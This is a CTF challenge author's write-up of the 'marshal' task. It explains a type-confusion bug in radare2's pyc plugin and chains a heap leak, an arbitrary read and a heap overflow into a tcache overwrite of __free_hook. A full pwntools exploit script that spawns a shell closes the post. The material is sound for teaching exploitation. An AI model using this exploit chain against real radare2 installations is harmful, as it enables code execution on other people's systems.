Introduction

Recently I got the chance to author two challenges for the CodegateCTF 2020 quals. I wrote two pwnable tasks, babyllvm and marshal. The second one, marshal, was released 12 hours before the end and therefore didn’t get any solves, even though it isn’t that difficult. On the other hand, babyllvm was released at the start of the CTF and was solved by PPP in just 2 hours, which is very impressive (but expected, it’s PPP…). In this post I’m going to describe how I came up with the idea for marshal. If you only want the exploit, skip to the end.

Motivations

Nowadays CTF players, especially those who play pwnable tasks, are bored of the ‘make a note’ cliche. Also, there isn’t really anything new to extract in the field of glibc heap exploitation techniques. But still, I felt that there should be a task with lots of memory corruption, since my other task, babyllvm, didn’t require a complex exploit. So I decided to pick a real-worldish target that has a clear bug, but requires lots of debugging and messing around. At first, I looked at the unicorn engine, and did some fuzzing and code auditing. However, I couldn’t find any bugs, which was depressing. So I decided to take a look at capstone, the well-known disassembly framework. However, I found that capstone already has a decent fuzzing harness, and figured that all the ‘shallow’ bugs would already have been fixed. Afterwards I looked at radare2, and thought it would be a nice target because it has had many CVEs involving memory corruption such as heap overflows, use-after-frees, etc.

Most of the bugs there were limited to a certain architecture or file format, so I decided to pick one file format or architecture and look for bugs in it. My selection was pyc, because it’s a very familiar format to CTFers, and the amount of code in that plugin was adequate for a 24-hour pwnable task. The pyc module is not part of default radare2; it is written as a plugin, which I found in the radare2-extras repository. I looked through the code and immediately found two bugs. Both were definitely exploitable, but not that interesting. Since anyone could identify them as bugs, I fixed them via a pull request.

Then I looked at the code a little bit more and found another bug, which became the idea for the challenge. At first, I wanted to make the challenge concept a radare2 jail. This is based on the fact that radare2 actually has a mode called sandboxed mode, which prevents access to networking and filesystems. Sandboxed mode can be enabled by providing the -S option. I wanted to make a challenge that uses memory corruption vulnerabilities to escape the sandbox. However, I gave up on this for two reasons.

First, I found a trick for breaking the sandbox, although I could have solved this by passing the --disable-debugger option to the ./configure script to disable the debugger build. The second problem was that radare2’s shell has a nondeterministic heap layout. There were several reasons for this. One was that the ‘quote of the day’ is randomly selected and varies in length. Another was that radare2 keeps a history cache that is written to a file. Also, radare2 has a complex shell IO mechanism that probably involves heap allocation and deallocation. So I changed my plan.

I decided to make a small program using the radare2 API, so that the heap randomness and all potential unintended solutions were removed.

#include <stdio.h>
#include <stdlib.h>
#include <r_bin.h>
#include <r_asm.h>
#include <r_list.h>
#include <r_util/r_buf.h>
#include <r_types.h>

typedef struct {
    RBuffer *f_buf;
    RAsm *f_asm;
} file;

static void printmenu() {
    puts("[1] Load a new file\n[2] Print disassembly");
}

static ut32 read_ut32() {
    char buf[0x20];
    fgets(buf, sizeof(buf), stdin);
    return (ut32)atoi(buf);
}

static ut64 read_ut64() {
    char buf[0x20];
    fgets(buf, sizeof(buf), stdin);
    return (ut64)atoll(buf);
}

static file *load_file() {
    
    printf("Enter length: ");
    ut64 len = read_ut64();
    if (len > 0x1000) {
        puts("too long!");
        return NULL;
    }

    ut8 *ptr = calloc(sizeof(ut8), len);
    fread(ptr, sizeof(ut8), len, stdin);

    RAsm *asm_ = r_asm_new(); 
    RBin *bin = r_bin_new();
    RBuffer *buf = r_buf_new_with_bytes(ptr, len);
    free(ptr);

    RBinOptions opt = {0};
    opt.sz = len;
    opt.pluginname = "pyc";
    opt.filename = "sample";

    bool res = r_bin_open_buf (bin, buf, &opt);
    if (!res) {
    error:
        puts("invalid file");
        r_bin_free (bin);
        return NULL;
    }

    if (!r_asm_use(asm_, "pyc")) {
        puts("unreachable error: contact admin");
        goto error;
    }

    r_bin_bind(bin, &asm_->binb);

    file *new = R_NEW0(file);
    new->f_buf = buf;
    new->f_asm = asm_;

    return new;
}

static void print_disasm(file *f) {
    RAsm *asm_ = f->f_asm;
    RBuffer *buf = f->f_buf;
    RAsmOp op;
    ut64 dlen, pos;
    ut8 *data;
    data = r_buf_data(buf, &dlen);
    if (!data) {
        puts("out of memory!");
        exit(-1);
    }
    pos = 0;
    while(pos < dlen) {
        r_asm_set_pc(asm_, pos);
        int incr = r_asm_disassemble(asm_, &op, data + pos, dlen - pos);
        if (!incr) {
            pos++;
        }
        else {
            printf("[%08x] %s\n", pos, r_asm_op_get_asm(&op));
            pos += incr;
        }
        
    }
    
}

int main(int argc, char **argv) {

    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    RList *files = r_list_new();

    while(1) {
        printmenu();
        ut32 opt = read_ut32();
        switch(opt) {
            case 1: {
                file *f = load_file();
                if (f) {
                    if (!r_list_append(files, f)) {
                        puts("r_list_append failed");
                        exit(-1);
                    }
                }
                break;
            }   
            case 2: {
                printf("Enter index: ");
                ut32 idx = read_ut32();
                if (idx >= r_list_length(files)) {
                    puts("invalid index");
                    exit(-1);
                }
                print_disasm(r_list_get_n(files, idx));
                break;
            }   
            default:
                puts("invalid option!");
                exit(-1);
        }
    }
    
    return 0;
}

It’s basically a program that takes in a pyc file from stdin and analyzes it, printing the disassembly if the user requests it. I made it look like a classic menu challenge, so that it isn’t intimidating to players.

To link the radare2 api libraries with the main program, I fixed the makefiles for radare2. While doing this, I learned a lot about makefiles unintentionally.

Vulns

There is only one bug that I used, but it could be used for many purposes. At a high level, the bug is a type confusion vulnerability. The pyc plugin consists of two parts: the bin module, which parses the binary file and extracts sections and segments, and the asm module, which generates the disassembly string for the bytecode.

A pyc file consists of a pyc header and a marshalled code object. Marshal, which is also the name of the challenge, is an encoding method that represents Python objects in a binary format. One type of Python object, the code object, is parsed in the manner below.

static pyc_object *get_code_object (RBuffer *buffer) {
    bool error = false;
    
    pyc_object *ret = R_NEW0 (pyc_object);
    pyc_code_object *cobj = R_NEW0 (pyc_code_object);
    if (!ret || !cobj) {
        free (ret);
        free (cobj);
        return NULL;
    }
    
    ret->type = TYPE_CODE_v1;
    ret->data = cobj;

    cobj->argcount = get_ut32 (buffer, &error);
    //cobj->kwonlyargcount = get_ut32 (buffer, &error);
    cobj->nlocals = get_ut32 (buffer, &error);
    cobj->stacksize = get_ut32 (buffer, &error);
    cobj->flags = get_ut32 (buffer, &error);

    //to help disassemble the code
    cobj->start_offset = r_buf_tell(buffer) + 4;
    cobj->code = get_object (buffer);
    cobj->end_offset = r_buf_tell(buffer);

    cobj->consts = get_object (buffer);
    cobj->names = get_object (buffer);
    cobj->varnames = get_object (buffer);
    cobj->freevars = get_object (buffer);
    cobj->cellvars = get_object (buffer);
    cobj->filename = get_object (buffer);
    cobj->name = get_object (buffer);
    cobj->firstlineno = get_ut32 (buffer, &error);
    cobj->lnotab = get_object (buffer);
    if (error) {
        free_object (cobj->code);
        free_object (cobj->consts);
        free_object (cobj->names);
        free_object (cobj->varnames);
        free_object (cobj->freevars);
        free_object (cobj->cellvars);
        free_object (cobj->filename);
        free_object (cobj->name);
        free_object (cobj->lnotab);
        free (cobj);
        R_FREE (ret);
    }
    return ret;
}
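
To make the field order concrete, here is a minimal sketch of an encoder that emits a code object in the order get_code_object reads it. The type bytes ('c', 's', '[') are the ones used by my exploit script at the end of this post; the helper code_object and its parameters are made up for illustration and are not part of radare2 or Python.

```python
import struct

def p32(value):
    """Pack an unsigned 32-bit little-endian integer."""
    return struct.pack("<I", value)

def string_object(data):
    # 's' type byte, 4-byte length, then the raw bytes
    return b"s" + p32(len(data)) + data

def list_object(items):
    # '[' type byte, 4-byte element count, then each encoded element
    return b"[" + p32(len(items)) + b"".join(items)

def code_object(code, consts, names, others, lnotab):
    """Hypothetical helper: emit fields in the order get_code_object reads them."""
    assert len(others) == 5          # varnames, freevars, cellvars, filename, name
    out = b"c"                       # code object type byte
    out += p32(0) * 4                # argcount, nlocals, stacksize, flags
    out += string_object(code)       # code
    out += consts + names            # consts, names (already encoded)
    out += b"".join(others)
    out += p32(0)                    # firstlineno
    out += lnotab
    return out

blob = code_object(
    code=b"\x74\x00\x00",                          # opcode 116 (LOAD_GLOBAL) + 2-byte arg
    consts=string_object(b"x"),
    names=list_object([string_object(b"z")]),
    others=[string_object(b"x")] * 5,
    lnotab=string_object(b"x"),
)
```

Note that nothing in this layout forces consts or names to be lists; the encoder happily accepts a string object for consts, which is exactly what the bug relies on.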

You can see that a code object has sub-objects named consts, names, varnames, etc. These objects are used in the assembly module to generate comments for the disassembly, as you can see below.

int r_pyc_disasm (RAsmOp *opstruct, const ut8 *code, RList *cobjs, RList *interned_table, ut64 pc) {
    pyc_code_object *cobj = NULL, *t = NULL;
    ut32 extended_arg = 0, i = 0, oparg;
    st64 start_offset, end_offset;
    RListIter *iter = NULL;

    char *name = NULL;
    char *arg = NULL;
    RList *varnames;
    RList *consts;
    RList *names;
    ut8 op;

    r_list_foreach (cobjs, iter, t) {
        start_offset = t->start_offset;
        end_offset = t->end_offset;
        if (pc > start_offset && pc < end_offset) {
            cobj = t;
            break;
        }
    }

    if (cobj != NULL) {
        /* TODO: adding line number and offset */
        varnames = cobj->varnames->data;
        consts = cobj->consts->data;
        names = cobj->names->data;

        op = code[i];
        i += 1;
        name = op_name[op];
        r_strbuf_set (&opstruct->buf_asm, name);
        if (name == NULL) {
            return 0;
        }
        if (op >= HAVE_ARGUMENT) {
            oparg = code[i] + code[i+1]*256 + extended_arg;
            extended_arg = 0;
            i += 2;
            if (op == EXTENDED_ARG)
                  extended_arg = oparg*65536;
              arg = parse_arg (op, oparg, names, consts, varnames, interned_table);
            if (arg != NULL) {
                r_strbuf_appendf (&opstruct->buf_asm, "%20s", arg);
            }
        }
        return i;
    }
    return 0;
}

Now look at the signature of parse_arg, which is char *parse_arg (ut8 op, ut32 oparg, RList *names, RList *consts, RList *varnames, RList *interned_table). From this we know that names and consts are expected to be RList pointers, i.e. the data of Python list objects. However, the bin module never checks the types of names and consts. Therefore we can provide a string object as names or consts, which causes a lot of trouble. Now we’ll see how to use this to build an arbitrary read/write primitive.
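
The missing check can be pictured with a toy model. This is only a sketch: PycObject, unchecked_names and checked_names are hypothetical names, and accepting both list and tuple tags in the checked version is my assumption about what a fix would allow, not what the plugin does.

```python
from dataclasses import dataclass
from typing import Any, Optional

TYPE_LIST = "["
TYPE_TUPLE = "("
TYPE_STRING = "s"

@dataclass
class PycObject:
    type: str   # marshal type tag
    data: Any   # payload; its real meaning depends on the tag

def unchecked_names(names_obj: PycObject) -> Any:
    # Mirrors `names = cobj->names->data;` in r_pyc_disasm: the tag is ignored.
    return names_obj.data

def checked_names(names_obj: PycObject) -> Optional[list]:
    # Hypothetical fix: only hand out the payload when the tag says it is a sequence.
    if names_obj.type not in (TYPE_LIST, TYPE_TUPLE):
        return None
    return names_obj.data

# A string object supplied where a list is expected.
confused = PycObject(TYPE_STRING, b"AAAAAAAA")
```

With the unchecked accessor the attacker-controlled bytes come back and would be treated as an RList; with the check the caller gets None and can bail out.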

Exploitation Plan

The first usage exists in libr/asm/arch/pyc_disasm.c. It is a pointer leak bug when disassembling the LOAD_GLOBAL opcode.

case LOAD_GLOBAL:
        t = (pyc_object*)r_list_get_n (names, oparg);
        if (t == NULL)
            return NULL;
        arg = t->data;

        ...

        arg = parse_arg (op, oparg, names, consts, varnames, interned_table);
        if (arg != NULL) {
            r_strbuf_appendf (&opstruct->buf_asm, "%20s", arg);
        }

t->data is assumed to be a char *, but for some Python objects, such as list or tuple objects, t->data is an RList *. Therefore, ‘print’ing an RList structure as if it were a string leaks a heap pointer.

The second usage exists in the LOAD_CONST opcode, also in pyc_disasm.c. Its root cause is that the disassembly module assumes the variable consts is a Python list object, whereas it can actually be anything: a float, string, ref… By faking a list object, we can obtain an arbitrary read primitive.

 case LOAD_CONST:
        t = (pyc_object*)r_list_get_n (consts, oparg);

The third usage needs more analysis, so it will be mentioned in the exploit analysis. But to jump to the conclusion, it is a very stable heap buffer overflow.

Infoleaks

We first use the two bugs to leak heap, libc and other ‘juicy’ addresses. The first bug is easy to exploit. By making a pyc file like the following we can leak a heap address.

magic = 0x0a0df303
date = 0
pay = p32(magic) + p32(date)
# a code object
pay += b"c"
# argsize nlocals stacksize flags
pay += p32(0) + p32(0) + p32(0) + p32(0)
# code
code = p8(116) + p32(0)
pay += string_object(code)
# consts, names, varnames, freevars, cellvars, filename, name
pay += string_object(b"x") 
pay += list_object([list_object([string_object(b"z")])])
pay += string_object(b"x") * 5
# firstlineno
pay += p32(0)
pay += string_object(b"x")

The variable names is now a list object containing a list object. So, r_list_get_n (names, 0) will return a list object containing a string object. Therefore, t->data will be a pointer to an RList structure, which looks like the following.

typedef struct r_list_t {
    RListIter *head;
    RListIter *tail;
    RListFree free;
    int length;
    bool sorted;
} RList;

So the head field will be leaked, which is most likely a heap pointer.
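
Here is a small sketch of why printing the structure with "%s" yields a usable pointer. It assumes the usual x86-64 layout for the RList shown above (three 8-byte pointers, a 4-byte int, a 1-byte bool plus padding) and uses an example heap address; the helper names are made up for illustration.

```python
import struct

def rlist_bytes(head, tail, free_fn, length, sorted_flag):
    """Pack an RList as it is assumed to sit in memory on x86-64."""
    # 3 pointers, a 4-byte int, a 1-byte bool, 3 bytes of padding
    return struct.pack("<QQQiB3x", head, tail, free_fn, length, sorted_flag)

def printed_as_string(raw):
    """What "%s" emits: every byte up to, but not including, the first NUL."""
    return raw.split(b"\x00", 1)[0]

def recover_pointer(leaked):
    """Same idea as u64(data.ljust(8, b"\\x00")) in the exploit script."""
    return struct.unpack("<Q", leaked.ljust(8, b"\x00"))[0]

head = 0x55702A85C6E0                      # example heap address
raw = rlist_bytes(head, head, 0, 1, 0)
leaked = printed_as_string(raw)            # the six non-zero bytes of `head`
```

Userland pointers have their top two bytes set to zero, so the output stops right after head. The leak would be truncated if one of the lower bytes of the pointer happened to be zero.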

To exploit the second bug, we need to place user controlled data at a known address. This is easy, because we have a heap leak due to the first bug. Then we make the consts variable a string whose value is p64(POINTER) where

POINTER ----> POINTER 1 (RList->head) ----> POINTER 2 (RListIter->data) ----> POINTER 3 (pyc_object->data)

Using this layout, we can read data located at POINTER 3.
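
The chain can be sketched with a flat byte string standing in for the heap. The four qwords match what aar_pyc in my exploit script places at a known address; the offsets used here (data as the first field of RListIter, and data at offset 8 of pyc_object) are assumptions inferred from that payload, and the helper names are made up.

```python
import struct

def p64(value):
    return struct.pack("<Q", value)

def build_fake_list(base, where):
    """Four consecutive qwords that will live at address `base`."""
    return (
        p64(base + 0x08)    # base+0x00: fake RList->head
        + p64(base + 0x10)  # base+0x08: fake RListIter->data
        + p64(base + 0x18)  # base+0x10: fake pyc_object->type (value is irrelevant)
        + p64(where)        # base+0x18: fake pyc_object->data
    )

def read_qword(memory, base, addr):
    """Read 8 bytes at absolute address `addr` from a blob mapped at `base`."""
    return struct.unpack_from("<Q", memory, addr - base)[0]

def follow_chain(memory, base):
    head = read_qword(memory, base, base)     # POINTER 1: RList->head
    obj = read_qword(memory, base, head)      # POINTER 2: RListIter->data
    return read_qword(memory, base, obj + 8)  # POINTER 3: pyc_object->data

target = follow_chain(build_fake_list(0x1000, 0xDEADBEEF), 0x1000)
```

Because the fake type field does not match any of the handled cases, LOAD_CONST falls through to the default branch and prints whatever POINTER 3 points to as a string.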

Heap Overflow

To obtain an arbitrary write primitive, we use a bug in the disassembly module. The bug exists at the generic_array_obj_to_string function in libr/asm/arch/pyc/pyc_disasm.c.

char *generic_array_obj_to_string (RList *l) {
    RListIter *iter = NULL;
    pyc_object *e = NULL;
    ut32 size = 256, used = 0;
    char *r = NULL, *buf = NULL;

    buf = (char*)calloc (1024, 0);
    r_list_foreach (l, iter, e) {
        while ( !(strlen (e->data) < size) ) { /* [1] */
            size *= 2;
            buf = realloc (buf, used + size);
            if (!buf) {
                eprintf ("generic_array_obj_to_string cannot request more memory");
                return NULL;
            }
        }
        strcat (buf, e->data);
        strcat (buf, ",");
        size -= strlen (e->data) + 1; /* [2] */
        used += strlen (e->data) + 1;
    }
    /* remove last , */
    buf[ strlen(buf)-1 ] = '\0';
    r = r_str_newf ("(%s)", buf);
    free(buf);
    return r;
}

Under normal circumstances, there should not be any exploitable bugs in this code. There might be off-by-one overflows, but they would be really hard to exploit. The main problem is that strlen is called on e->data multiple times, without saving the result in a local variable. Therefore, strlen (e->data) may have different values at [1] and [2]. How is this possible? It happens if the strcat calls alter the contents of e->data.

This function is called when handling the LOAD_CONST opcode.

case LOAD_CONST:
        t = (pyc_object*)r_list_get_n (consts, oparg);
        if (t == NULL)
            return NULL;
        switch (t->type) {
        case TYPE_CODE_v1:
            arg = strdup("CodeObject");
        break;
        case TYPE_TUPLE:
            arg = generic_array_obj_to_string (t->data);
        break;
        case TYPE_STRING:
        case TYPE_INTERNED:
        case TYPE_STRINGREF:
            arg = r_str_newf ("'%s'", t->data);
        break;
        default:
            arg = t->data;
        }
    break;

However as mentioned before, the consts variable can be a fake RList structure forged by a user supplied payload. This implies that the argument to generic_array_obj_to_string can be an arbitrary pointer. Therefore, we can create a condition where e->data changes between [1] and [2].

One easy idea is to make e->data equal to buf. However, making buf and e->data overlap makes strcat loop forever; the man page of strcat states that the strings may not overlap.

Instead, we make the second call to strcat (the one appending “,”) change e->data. To do so, we carefully forge RList *l so that it satisfies the following conditions.

1. l has 3 entries.
2. The first entry is a string with length 254.
3. The second entry points to buf + 255
4. The third entry contains the string to overflow the buffer

Now, let’s process the entries one by one.

  1. When the first entry is processed, size will be reduced to 256 - 254 - 1 = 1.
  2. During the processing of the second entry, realloc will not be called because strlen(e->data) is 0 and size is 1. strlen(e->data) is 0 because e->data points to buf + 255 which is the middle of an untouched calloc‘ed buffer. However, strlen(e->data) in [2] is 1, due to the added “,” character. Therefore size becomes 1 - 1 - 1 which is 0xFFFFFFFF.
  3. Now that size is UINT_MAX (size is a ut32), we can strcat anything without worrying about the size limit.
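
The three steps above can be replayed with a toy model of the loop. This is a sketch, not the real function: memory is a flat bytearray, addresses are offsets into it, realloc is not modelled, and the helper names and offsets (0x400, 0x600) are chosen arbitrarily for illustration.

```python
def c_strlen(mem, addr):
    """Length of the NUL-terminated string starting at `addr`."""
    return mem.index(0, addr) - addr

def c_strcat(mem, dst, src):
    """Append `src` (bytes without NUL) to the C string at `dst`, then terminate it."""
    end = dst + c_strlen(mem, dst)
    mem[end:end + len(src)] = src
    mem[end + len(src)] = 0

def simulate(mem, buf, entries):
    """Replay the size bookkeeping of generic_array_obj_to_string."""
    size = 256
    trace = []
    for e in entries:
        while not (c_strlen(mem, e) < size):                  # [1]
            size = (size * 2) & 0xFFFFFFFF                    # realloc not modelled
        src = bytes(mem[e:e + c_strlen(mem, e)])
        c_strcat(mem, buf, src)
        c_strcat(mem, buf, b",")
        size = (size - (c_strlen(mem, e) + 1)) & 0xFFFFFFFF   # [2], ut32 wraparound
        trace.append(size)
    return trace

mem = bytearray(0x1000)
buf = 0
first, third = 0x400, 0x600
mem[first:first + 254] = b"A" * 254      # entry 1: a 254-byte string
mem[third:third + 0x40] = b"B" * 0x40    # entry 3: the overflow payload
second = buf + 255                       # entry 2: points into buf itself
trace = simulate(mem, buf, [first, second, third])
```

After the second entry the tracked size is 0xFFFFFFFF, so the check at [1] passes for the third entry no matter how long it is, and its bytes are appended starting at buf + 256 without the buffer ever being grown.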

There are many structures to overwrite, but I chose to overwrite the fd (next pointer) of a freed chunk in a tcache bin with the address of __free_hook. Afterwards, using a pyc float object, I got an allocation at __free_hook, wrote the address of system there, and obtained a shell.
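
The effect of corrupting that pointer can be shown with a toy model of a single tcache bin. This is only a sketch: it treats the bin as a plain LIFO linked list, ignores the per-bin counter and any hardening in newer glibc versions, and the class name and addresses are made up.

```python
class ToyTcacheBin:
    """One tcache bin modelled as a LIFO singly linked list of chunk addresses."""

    def __init__(self):
        self.head = 0          # address of the first free chunk, 0 if empty
        self.next_of = {}      # chunk address -> stored next pointer (fd)

    def free(self, chunk):
        # The freed chunk stores the old head and becomes the new head.
        self.next_of[chunk] = self.head
        self.head = chunk

    def malloc(self):
        # Pop the head; whatever it stored as `next` becomes the new head.
        chunk = self.head
        self.head = self.next_of.get(chunk, 0)
        return chunk

FREE_HOOK = 0x7F0000001000     # hypothetical address of __free_hook
VICTIM = 0x5000                # hypothetical freed chunk next to the overflowed buffer

tcache = ToyTcacheBin()
tcache.free(VICTIM)
tcache.next_of[VICTIM] = FREE_HOOK   # the heap overflow rewrites the stored next pointer

first = tcache.malloc()    # returns the victim chunk itself
second = tcache.malloc()   # returns the forged pointer
```

This is why exp2 in the script below carries two float objects of the same size: the first allocation consumes the corrupted chunk, and the second one lands on __free_hook and receives the address of system.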

Here is my exploit script.

#!/usr/bin/python3
from pwn import *
import sys
import subprocess

def string_object(data):
    return b"s" + p32(len(data)) + data

def string_object_with_ref(data):
    return p8(ord("s")^0x80) + p32(len(data)) + data

def list_object(objects):
    n = len(objects)
    pay = b"["
    pay += p32(n)
    for x in objects:
        pay += x
    return pay

def tuple_object(objects):
    n = len(objects)
    pay = b"("
    pay += p32(n)
    for x in objects:
        pay += x
    return pay

def stringref_object(ref):
    pay = b"R"
    pay += p32(ref)
    return pay

def interned_object(data):
    return b"t" + p32(len(data)) + data

def float_object(data):
    return b"f" + p8(len(data)) + data

def ref_object(ref):
    pay = b"r"
    pay += p32(ref)
    return pay

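def random_pyc(seed):
    # NOTE: this helper is never called by the exploit. expand() is not defined
    # anywhere in this script, so the string branch below would raise NameError.
    trim = lambda x: x & 0xF0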
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_GLOBAL)
    code = p8(116) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    for x in seed[:7]:
        if x & 1:
            pay += string_object(b"x"*expand(x))
        else:
            pay += float_object(b"y"*trim(x))

    # firstlineno
    if seed[7] & 1:
        pay += p32(0)
        pay += string_object(b"x")

    return pay

def heap_leak_pyc():
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_GLOBAL)
    code = p8(116) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += string_object(b"x") 
    pay += list_object([list_object([string_object(b"z")])])
    pay += string_object(b"x") * 5
    # firstlineno
    pay += p32(0)
    pay += string_object(b"x")
    return pay

def aar_pyc(where, leak):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts
    ptr = leak + 0x55702a874d00 - 0x55702a85c6e0
    pay += float_object(p64(ptr+8)+p64(ptr+0x10)+p64(ptr+0x18)+p64(where)) 
    # names, varnames, freevars, cellvars, filename, name
    pay += string_object(b"x") * 6
    # firstlineno
    pay += p32(0)
    pay += string_object(b"x")
    return pay

def exp1(leak, where):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object with ref, so that None is pushed to list[0]
    pay += p8(0x80^ord("c"))
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    ptr = leak + 0x55a27f113b70 - 0x55a27f0e26e0
    # fake RList object -> head
    fakelist = p64(ptr+8)
    # data, next
    fakelist += p64(ptr+0x18) + p64(0)
    # tuple object
    fakelist += p64(ord("(")) + p64(ptr+0x28)
    # RList structure -> head
    fakelist += p64(ptr+0x30)
    # data, next
    fakelist += p64(ptr+0x40) + p64(ptr+0x50)
    # list[0]: string object
    fakelist += p64(ord("s")) + p64(ptr+0x90)
    # data, next
    fakelist += p64(ptr+0x60) + p64(ptr+0x70)
    # list[1]: string object, points to calloced buffer
    calloced = leak + 0x55daa8fc6480 - 0x55daa8f7b6e0
    fakelist += p64(ord("s")) + p64(calloced+0xFF)
    # data, next
    fakelist += p64(ptr+0x80) + p64(0)
    # list[2]: string object. now size is -1, we can do pretty much anything
    fakelist += p64(ord("s")) + p64(ptr+0x90+0x100)
    str1 = b"\xcc"*0xFE
    str2 = b"\xdd"*(0x55608a8ca5c0 - 0x55608a8ca580) + p64(where)
    fakelist += str1.ljust(0x100, b"\x00")
    fakelist += str2.ljust(0x100, b"\x00")

    fakelist = fakelist.ljust(0x800, b"\x00")
    # a fake RList structure
    pay += string_object(fakelist)
    pay += string_object(b"x") * 6
    pay += p32(0)
    pay += string_object(b"x")
    return pay

def exp2(what):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object with ref, so that None is pushed to list[0]
    pay += p8(0x80^ord("c"))
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += float_object(b"\x00"*0xFF)
    pay += float_object(what.ljust(0xFF, b"\x00"))
    return pay

def exp3(cmd):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object with ref, so that None is pushed to list[0]
    pay += p8(0x80^ord("c"))
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += string_object(cmd)
    return pay

def feng1():
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_GLOBAL)
    code = p8(116) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += string_object(b"\x00"*0x590)
    pay += string_object(b"\x00"*0x100)
    return pay

def load(data):
    p.sendlineafter("[2] Print disassembly\n", "1")
    p.sendlineafter("Enter length: ", str(len(data)))
    p.send(data)

def disassemble(index):
    p.sendlineafter("[2] Print disassembly\n", "2")
    p.sendlineafter("Enter index: ", str(index))

if __name__ == "__main__":

    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    p = remote(sys.argv[1], int(sys.argv[2]))
    # leak a heap address
    load(heap_leak_pyc())
    disassemble(0)
    p.recvuntil("LOAD_GLOBAL              ")
    HEAP = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
    log.info("HEAP: 0x%x"%HEAP)

    # leak a libc address
    load(aar_pyc(HEAP + 0x5648213fc3f0 - 0x5648214146e0, HEAP))
    disassemble(1)
    p.recvuntil("LOAD_CONST              ")
    # plugin_free
    LIBC = u64(p.recvline().strip(b"\n").ljust(8,b"\x00")) + 0x7f97c9d56000 - 0x7f97ca98557a

    log.info("LIBC: 0x%x"%LIBC)
    # pwntools under Python 3 keys ELF.symbols by str
    free_hook = LIBC + libc.symbols['__free_hook']
    system = LIBC + libc.symbols['system']

    load(exp1(HEAP, free_hook))
    # create a layout like unsorted bin -- tcache (0x110)
    load(feng1())
    disassemble(2)

    # overflowing will cause tcache entry to be corrupted, next-next malloc to 0x100 will cause __free_hook to be allocated
    load(exp2(p64(system)))

    # free hook is now overwritten to system. load_file() frees the buffer
    # holding our input, so this should end up calling system("/bin/sh")
    load(b"/bin/sh\x00")
    p.interactive()

Overall

I think a few teams successfully worked out the first and second usages of the bug. However, as far as I know, no team found the last usage (this is my guess; someone may have been very close to solving the challenge). I think that’s because the notion that a heap overflow occurs in the disassembly generation phase is very counter-intuitive, as printing state usually doesn’t have critical side effects in most programs. It took me some time to find the third usage myself, and at one point I thought of reverting my fix for the first bug (a single null byte overflow). However, I think it was a good decision not to implant that bug, because crafting an exploit for a single null byte overflow is miserable when allocation and deallocation take place so often.

BTW, thanks to everyone who participated in Codegate CTF 2020. I decided to publish a write-up for babyllvm after the write-up submissions are done. I’d also like to see write-ups for the solved challenges, so that I can learn whether I made a mistake or whether there is a better solution than the intended one.

Babyllvm got 40 solves, and marshal got no solves. But I’m pretty sure that if we ran the CTF for 48 hours, marshal would get > 10 solves.

Scoreboard

And one important thing: I’m planning to make a pull request to radare2-extras as soon as possible. If you found a bug other than the ones I mentioned, please make a pull request for that as well.

For those who are participating in the final: I will prepare even more fun tasks for the final, be ready!